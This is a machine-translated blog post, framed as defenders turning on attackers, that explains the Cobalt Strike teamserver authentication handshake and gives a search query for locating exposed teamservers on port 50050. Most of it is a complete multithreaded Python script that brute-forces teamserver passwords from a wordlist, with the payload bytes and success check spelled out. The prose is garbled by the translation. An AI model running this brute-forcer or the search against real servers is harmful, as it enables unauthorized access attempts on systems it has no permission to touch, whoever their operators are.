Blue decides red - burst CS teamserver password

0x00: brief introduction

Cobalt strike( Hereinafter referred to as CS)#

as everyone knows ,CS It's an example. MSF On the basis of GUI Frame type “ Multiplayer Sports ” Penetration testing tools , Integrated port forwarding 、 Service scan 、 Automatic overflow , Multimode port monitoring ,exe、powershell Trojan generation, etc .

Fishing attacks include ： Site cloning , Target information acquisition ,java perform , Browser automatic attack, etc .

Cobalt Strike Mainly used in team operations , It can be said that it is an artifact of team penetration , It allows multiple attackers to connect to the community server at the same time , Share attack resources with target information and sessions.

Cobalt Strike As a collaboration APT Tools , Penetration testing and actions for intranet apt Control terminal function of , Make it into many APT The organization's first choice .

0x01: origin

1、 Many teams can connect quickly for the convenience of their friends Teamserver, Basically, they are all weak passwords , It's common :123456、123123 etc.

2、 Many also use the default Teamserver port 50050

3、 Gather the weak entry points above , Start testing the burst connection .

0x02: To write

One 、 own teamserver Link test . After the server is set up , Access the test through the browser .google The browser test results are as follows .

The test results in Firefox browser are as follows

F12 See what happens

Two 、 Let's go and have a look at Teamserver Method of authentication .

if [ -e ./cobaltstrike.store ]; then
    print_info "Will use existing X509 certificate and keystore (for SSL)"
else
    print_info "Generating X509 certificate and keystore (for SSL)"
    keytool -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias cobaltstrike -dname "CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, S=Cyberspace, C=Earth"
fi

# start the team server.
java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=50050 -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword=123456 -server -XX:+AggressiveHeap -XX:+UseParallelGC -classpath ./cobaltstrike.jar server.TeamServer $*

The first is the raw data type ostensibly used to protect the authentication of sockets .

The second is based on Java Authentication of serialized objects , This includes user names that are mostly symbols .

among cobaltstrike.store That's true

In the fixed 261 Byte length command , The first authentication request is roughly defined like this ：

4 Byte Magic \x00\x00\xBE\xEF
1 Byte Password Length (unsigned int)
Password (unsigned int cast char array)
Padding \x65 "A" * ( Length( Password ) - 256 )

It looks like this on the wire , But padding is ignored , It could be anything . The authentication routine reads at most 256 individual “ length ”.#

\x00\x00\xBE\xEF\x08passwordAAAAAAAAAAAAAA...AAAA

If the password provided matches the password defined when starting the team server , Then the team server will be 4 Byte password to reply .

< This password cannot be empty >

\x00\x00\xCA\xFE

otherwise , The team server returns null

\x00\x00\x00\x00

3、 ... and 、python3 Write ideas #

conn.open(host, port)

payload = bytearray(b"\x00\x00\xbe\xef") + len(password).to_bytes(1, "big", signed=True) + bytes(bytes(password, "ascii").ljust(256, b"A"))

conn.send(payload)

Finally, determine whether the returned result exists “\x00\x00\xca\xfe”, If it exists, the password is correct

Four 、 Look for the roosters Teamserver

"Cobalt strike" && port="50050"

5、 ... and 、 On and off

#!/usr/bin/env python3

import time,socket,ssl,argparse,concurrent.futures,sys

MIN_PYTHON = (3, 3)
if sys.version_info < MIN_PYTHON:
    sys.exit("Python %s.%s or later is required.\n" % MIN_PYTHON)

parser = argparse.ArgumentParser()

parser.add_argument("host",
                    help="Teamserver address")
parser.add_argument("wordlist", nargs="?",
                    help="Newline-delimited word list file")

args = parser.parse_args()

class NotConnectedException(Exception):
    def __init__(self, message=None, node=None):
        self.message = message
        self.node = node

class DisconnectedException(Exception):
    def __init__(self, message=None, node=None):
        self.message = message
        self.node = node

class Connector:
    def __init__(self):
        self.sock = None
        self.ssl_sock = None
        self.ctx = ssl.SSLContext()
        self.ctx.verify_mode = ssl.CERT_NONE
        pass

    def is_connected(self):
        return self.sock and self.ssl_sock

    def open(self, hostname, port):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.settimeout(10)
        self.ssl_sock = self.ctx.wrap_socket(self.sock)

        if hostname == socket.gethostname():
            ipaddress = socket.gethostbyname_ex(hostname)[2][0]
            self.ssl_sock.connect((ipaddress, port))
        else:
            self.ssl_sock.connect((hostname, port))

    def close(self):
        if self.sock:
            self.sock.close()
        self.sock = None
        self.ssl_sock = None

    def send(self, buffer):
        if not self.ssl_sock: raise NotConnectedException("Not connected (SSL Socket is null)")
        self.ssl_sock.sendall(buffer)

    def receive(self):
        if not self.ssl_sock: raise NotConnectedException("Not connected (SSL Socket is null)")
        received_size = 0
        data_buffer = b""

        while received_size < 4:
            data_in = self.ssl_sock.recv()
            data_buffer = data_buffer + data_in
            received_size += len(data_in)

        return data_buffer

def passwordcheck(password):
    if len(password) > 0:
        result = None
        conn = Connector()
        conn.open(args.host, 50050)
        payload = bytearray(b"\x00\x00\xbe\xef") + len(password).to_bytes(1, "big", signed=True) + bytes(bytes(password, "ascii").ljust(256, b"A"))
        conn.send(payload)
        if conn.is_connected(): result = conn.receive()
        if conn.is_connected(): conn.close()
        if result == bytearray(b"\x00\x00\xca\xfe"): return password
        else: return False
    else: print("Do not have a blank password!!!")

passwords = []

if args.wordlist: passwords = open(args.wordlist).read().split("\n")
else: 
    for line in sys.stdin: passwords.append(line.rstrip())

if len(passwords) > 0:
    attempts = 0
    failures = 0

    with concurrent.futures.ThreadPoolExecutor(max_workers=30) as executor:

        future_to_check = {executor.submit(passwordcheck, password): password for password in passwords}
        for future in concurrent.futures.as_completed(future_to_check):
            password = future_to_check[future]
            try:
                data = future.result()
                attempts = attempts + 1
                if data:
                    print ("Successful Attack!!!")
                    print ("Secquan NB!!")
                    print("Target Password: {}".format(password))
            except Exception as exc:
                failures = failures + 1
                print('%r generated an exception: %s' % (password, exc))

else:
    print("Password(s) required")

Way of execution test.py x.x.x.x pass.txt

pass.txt It's the password file you want to explode Article reference

https://github.com/ryanohoro/csbruter